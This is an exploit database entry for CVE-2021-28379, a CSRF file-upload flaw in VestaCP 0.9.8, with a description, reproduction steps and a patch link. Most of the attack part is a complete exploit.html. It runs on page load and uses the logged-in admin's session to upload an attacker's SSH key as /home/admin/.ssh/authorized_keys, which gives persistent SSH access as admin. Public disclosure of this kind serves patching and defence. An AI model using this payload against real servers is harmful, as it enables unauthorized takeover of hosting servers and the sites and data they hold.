VestaCP 0.9.8 - File Upload CSRF

vendor:

VestaCP

by:

Fady Othman

8.8

CVSS

HIGH

File Upload CSRF

Unknown

CWE

Product Name: VestaCP

Affected Version From: Vesta Control Panel (aka VestaCP) through 0.9.8-27 and myVesta through 0.9.8-26-39

Affected Version To: Unknown

Patch Exists: YES

Related CWE: CVE-2021-28379

CPE: Unknown

Metasploit:

Other Scripts:

Platforms Tested:

2021

VestaCP 0.9.8 – File Upload CSRF

I found that the checks performed by the upload functionality are insufficient, the upload functionality is vulnerable to CSRF, in addition it allows uploading files and creating folders under "/tmp" and under the home folder (usually "/home/admin"), the later is the one that is important for this exploit to work. I was able to use this to create a ".ssh" folder in the admin home and upload "authorized_keys" file which allowed me to access the server later as "admin" using SSH. Since this relies on a CSRF the admin has to visit a link, please note that sshd is already installed by VestaCP when using the default installation script so no need to install it, also please note that files can be replaced so even if the admin has already added "authorized_keys" file, it will be replaced with the attacker's file. Affected endpoint: "/upload/index.php", i.e. "/upload/index.php?dir=/home/admin/.ssh/"

Mitigation:

Unknown

Source

Exploit-DB raw data:

# Exploit Title: VestaCP 0.9.8 - File Upload CSRF
# Exploit Author: Fady Othman 
# Date: 16-03-2021
# Vendor Homepage: https://vestacp.com/
# Software Link: https://github.com/myvesta/vesta
# Version: Vesta Control Panel (aka VestaCP) through 0.9.8-27 and myVesta through 0.9.8-26-39
# CVE ID: CVE-2021-28379
# Patch: https://github.com/myvesta/vesta/commit/3402071e950e76b79fa8672a1e09b70d3860f355

## Description
I found that the checks performed by the upload functionality are insufficient, the upload functionality is vulnerable to CSRF, in addition it allows uploading files and creating folders under "/tmp" and under the home folder (usually "/home/admin"), the later is the one that is important for this exploit to work.

I was able to use this to create a ".ssh" folder in the admin home and upload "authorized_keys" file which allowed me to access the server later as "admin" using SSH.

Since this relies on a *CSRF* the admin has to visit a link, please note that *sshd* is already installed by *VestaCP* when using the default installation script so no need to install it, also please note that files can be replaced so even if the admin has already added "authorized_keys" file, it will be replaced with the attacker's file.

Affected endpoint: "/upload/index.php", i.e. "/upload/index.php?dir=/home/admin/.ssh/"

## Steps to reproduce.
1. Install the latest version of VestaCP in your machine by following the instructions at https://vestacp.com/install/.
2. Login as the admin in Firefox, then open "exploit.html".
3. ssh into the machine using 'ssh -i id_rsa admin@victimmachine', now you have access as admin.

# exploit.html 

<html>
<head> 
<script>

function exploit() {
	var mystring = `ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCnXyu8AsFjbuE5YMUa74PrNkO9coGWnw59v/cSVMgOZVpx+UziT0BRFurhVkyujTCXdz6OlN4yFZjCVMbAgZ7/liNu9ecGSGNcUTC+Br5YawlG9QICEaJ/bK32+luKdM1c5ONbRby+ARFsC9+iZu6IkAPnSRntbNgDZpuej/cKfm85EnvdQPAijvs4+899w2+rGvhSQ0wH4l1KNlV1yVoAsg0PFYGDnbygGA5Eo4k9LHwa2Hsm5b2Q5GhqlEUCgYFOjScuORczwhctVtp4VWKXiFoMLJupNhot/OqUXkoNgE6UUd75XcLNGMBiyfLpfXO2u1sGsw5nTiKvNn+1YdC7AKHWBjxl3wDY8hMf/gcveV4Nh45mMUu0p6kptDdVhELeeys8euHiTWOk+FLCKkps9eLiyl8gQUfWcFVj0dgqYVJne2S1U33wnofRhj0fGWAJf14xHhwnTi7u58u+0U1NJchOTHAaeX1Swqk2J34Ny9GwD01a71DFIIcIbgcef6c= fady@fady-Lenovo-Legion-Y530-15ICH-1060`;
	var fileContent = new Blob([mystring], {
    		type: 'text/plain'
	});
	myFormData = new FormData();
	myFormData.append("files", fileContent, "authorized_keys");
	fetch("https://localhost:8083/upload/index.php?dir=/home/admin/.ssh/", {
    	method: "post",
    	body: myFormData,
    	credentials: "include"
}); }
</script>

</head>

<body onload="exploit();">


</body>
</html>